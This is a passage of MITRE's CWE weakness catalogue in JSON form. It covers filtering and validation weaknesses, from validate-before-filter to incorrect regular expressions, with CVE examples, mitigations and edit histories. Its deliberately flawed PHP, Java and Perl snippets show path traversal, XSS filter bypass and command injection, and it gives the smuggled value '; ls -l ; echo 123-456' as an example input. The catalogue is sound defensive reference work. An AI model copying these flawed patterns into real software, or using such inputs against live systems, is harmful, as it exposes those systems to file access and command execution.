owner.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createDir($userName,$dirName){}","xhtml:div":{"#text":"$userDir = \'/users/\'. $userName;if(strpos($dirName,\'..\') !== false){}$dirName = str_replace(\'~\',\'\',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"echo \'Directory name contains invalid sequence\';return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"//filter out \'~\' because other scripts identify user directories by this prefix"}}},"Body_Text":"While the script attempts to screen for \'..\' sequences, an attacker can submit a directory path including \\".~.\\", which will then become \\"..\\" after the filtering step. This allows a Path Traversal (CWE-21) attack to occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0934","Description":"Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934"},{"Reference":"CVE-2003-0282","Description":"Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282"}]},"Functional_Areas":{"Functional_Area":"Protection Mechanism"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Validate-Before-Filter"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":{"#text":"This category is probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Functional_Areas, Relationships, Research_Gaps, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}],"Previous_Entry_Name":{"#text":"Validate-before-filter","attr":{"@_Date":"2008-04-11"}}}},"182":{"attr":{"@_ID":"182","@_Name":"Collapse of Data into Unsafe Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software filters data in a way that causes it to be reduced or \\"collapsed\\" into an unsafe value that violates an expected security property.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"33","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"34","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"35","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."},{"Description":"Canonicalize the name to match that of the file system\'s representation of the name. This can sometimes be achieved with an available API (e.g. in Win32 the GetFullPathName function)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0815","Description":"\\"/.////\\" in pathname collapses to absolute path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2005-3123","Description":"\\"/.//..//////././\\" is collapsed into \\"/.././\\" after \\"..\\" and \\"//\\" sequences are removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123"},{"Reference":"CVE-2002-0325","Description":"\\".../...//\\" collapsed to \\"...\\" due to removal of \\"./\\" in web server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0325"},{"Reference":"CVE-2002-0784","Description":"chain: HTTP server protects against \\"..\\" but allows \\".\\" variants such as \\"////./../.../\\". If the server removes \\"/..\\" sequences, the result would collapse into an unsafe value \\"////../\\" (CWE-182).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0784"},{"Reference":"CVE-2005-2169","Description":"MFV. Regular expression intended to protect against directory traversal reduces \\".../...//\\" to \\"../\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2001-1157","Description":"XSS protection mechanism strips a &lt;script&gt; sequence that is nested in another &lt;script&gt; sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Collapse of Data into Unsafe Value"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS11-J","Entry_Name":"Eliminate noncharacter code points before validation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Character Stripping Vulnerabilities&#34;, Page 437"}}},"Notes":{"Note":{"#text":"Overlaps regular expressions, although an implementation might not necessarily use regexp\'s.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"183":{"attr":{"@_ID":"183","@_Name":"Permissive List of Allowed Inputs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Allowlist / Allow List","Description":"This is used by CWE and CAPEC instead of other commonly-used terms.  Its counterpart is denylist."},{"Term":"Safelist / Safe List","Description":"This is often used by security tools such as firewalls, email or web gateways, proxies, etc."},{"Term":"Whitelist / White List","Description":"This term is frequently used, but usage has been declining as organizations have started to adopt other terms."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12799","Description":"chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799"},{"Reference":"CVE-2019-10458","Description":"sandbox bypass using a method that is on an allowlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458"},{"Reference":"CVE-2017-1000095","Description":"sandbox bypass using unsafe methods that are on an allowlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095"},{"Reference":"CVE-2019-10458","Description":"CI/CD pipeline feature has unsafe elements in allowlist, allowing bypass of script restrictions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458"},{"Reference":"CVE-2017-1000095","Description":"Default allowlist includes unsafe methods, allowing bypass of sandbox","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Permissive Whitelist"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"71"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Eliminating Metacharacters&#34;, Page 435"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Permissive Whitelist","attr":{"@_Date":"2020-02-24"}}}},"184":{"attr":{"@_ID":"184","@_Name":"Incomplete List of Disallowed Inputs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete, leading to resultant weaknesses.","Extended_Description":"Developers often try to protect their products against malicious input by performing tests against inputs that are known to be bad, such as special characters that can invoke new commands.  However, such lists often only account for the most well-known bad inputs. Attackers may be able to find other malicious inputs that were not expected by the developer, allowing them to bypass the intended protection mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"79","@_View_ID":"1000","@_Chain_ID":"692"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"78","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Denylist / Deny List","Description":"This is used by CWE and CAPEC instead of other commonly-used terms.  Its counterpart is allowlist."},{"Term":"Blocklist / Block List","Description":"This is often used by security tools such as firewalls, email or web gateways, proxies, etc."},{"Term":"Blacklist / Black List","Description":"This term is frequently used, but usage has been declining as organizations have started to adopt other terms."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Developers might begin to develop a list of bad inputs as a fast way to fix a particular weakness, instead of fixing the root cause. See [REF-141]."},{"Phase":"Architecture and Design","Note":"The design might rely solely on detection of malicious inputs as a protection mechanism."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"Exploitation of a vulnerability with commonly-used manipulations might fail, but minor variations might succeed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Input Validation","Description":"Do not rely exclusively on detecting disallowed inputs.  There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants.  Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify \\"good\\" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to stop XSS attacks by removing all occurences of \\"script\\" in an input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String removeScriptTags(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Because the code only checks for the lower-case \\"script\\" string, it can be easily defeated with upper-case script tags."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2309","Description":"product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309"},{"Reference":"CVE-2005-2782","Description":"PHP remote file inclusion in web application that filters \\"http\\" and \\"https\\" URLs, but not \\"ftp\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2782"},{"Reference":"CVE-2004-0542","Description":"Programming language does not filter certain shell metacharacters in Windows environment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0542"},{"Reference":"CVE-2004-0595","Description":"XSS filter doesn\'t filter null characters before looking for dangerous tags, which are ignored by web browsers. MIE and validate-before-cleanse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595"},{"Reference":"CVE-2005-3287","Description":"Web-based mail product doesn\'t restrict dangerous extensions such as ASPX on a web server, even though others are prohibited.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3287"},{"Reference":"CVE-2004-2351","Description":"Resultant XSS when only &lt;script&gt; and &lt;style&gt; are checked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2351"},{"Reference":"CVE-2005-2959","Description":"Privileged program does not clear sensitive environment variables that are used by bash. Overlaps multiple interpretation error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2959"},{"Reference":"CVE-2005-1824","Description":"SQL injection protection scheme does not quote the \\"\\\\\\" special character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1824"},{"Reference":"CVE-2005-2184","Description":"Detection of risky filename extensions prevents users from automatically executing .EXE files, but .LNK is accepted, allowing resultant Windows symbolic link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2184"},{"Reference":"CVE-2007-1343","Description":"Product uses list of protected variables, but accidentally omits one dangerous variable, allowing external modification","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1343"},{"Reference":"CVE-2007-5727","Description":"Chain: product only removes SCRIPT tags (CWE-184), enabling XSS (CWE-79)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2006-4308","Description":"Chain: product only checks for use of \\"javascript:\\" tag (CWE-184), allowing XSS (CWE-79) using other tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"},{"Reference":"CVE-2007-3572","Description":"Chain: OS command injection (CWE-78) enabled by using an unexpected character that is not explicitly disallowed (CWE-184)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572"},{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in list of disallowed values for web server, allowing path traversal attacks when the server is run on Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Blacklist"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-141"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Eliminating Metacharacters&#34;, Page 435"}}]},"Notes":{"Note":{"attr":{"@_Type":"Relationship"},"xhtml:p":"Multiple interpretation errors can indirectly introduce inputs that should be disallowed. For example, a list of dangerous shell metacharacters might not include a metacharacter that only has meaning in one particular shell, not all of them; or a check for XSS manipulations might ignore an unusual construct that is supported by one web browser, but not others."}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Description, Detection_Factors, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Incomplete Blacklist","attr":{"@_Date":"2020-02-24"}}}},"185":{"attr":{"@_ID":"185","@_Name":"Incorrect Regular Expression","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software specifies a regular expression in a way that causes data to be improperly matched or compared.","Extended_Description":"When the regular expression is used in protection mechanisms such as filtering or validation, this may allow an attacker to bypass the intended restrictions on the incoming data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"187","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"182","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":["Unexpected State","Varies by Context"],"Note":"When the regular expression is not correctly specified, data might have a different format or type than the rest of the program expects, producing resultant weaknesses or errors."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In PHP, regular expression checks can sometimes be bypassed with a null byte, leading to any number of weaknesses."}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-45"},"Phase":"Architecture and Design","Strategy":"Refactoring","Description":"Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject the regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor the regular expression."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-37"},"Intro_Text":"The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$phone = GetPhoneNumber();if ($phone =~ /\\\\d+-\\\\d+/) {}else {}","xhtml:br":["",""],"xhtml:div":[{"#text":"system(\\"lookup-phone $phone\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"# looks like it only has hyphens and digits","xhtml:br":""},{"#text":"error(\\"malformed number!\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"An attacker could provide an argument such as: \\"; ls -l ; echo 123-456\\" This would pass the check, since \\"123-456\\" is sufficient to match the \\"\\\\d+-\\\\d+\\" portion of the regular expression."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2109","Description":"Regexp isn\'t \\"anchored\\" to the beginning or end, which allows spoofed values that have trusted values as 